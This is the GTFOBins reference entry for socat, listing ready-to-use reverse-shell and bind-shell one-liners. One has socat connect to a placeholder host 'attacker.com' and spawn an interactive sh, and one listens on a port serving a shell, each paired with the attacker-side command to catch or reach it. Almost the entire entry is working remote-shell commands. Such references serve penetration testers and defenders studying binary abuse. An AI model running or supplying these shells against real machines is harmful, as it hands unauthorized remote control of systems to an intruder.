GTFOBins.github.io/_gtfobins/socat.md
2018-05-28 17:48:26 +02:00

585 B

functions
reverse-shell-interactive bind-shell-interactive
description code
Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
description code
Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell. LPORT=12345 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane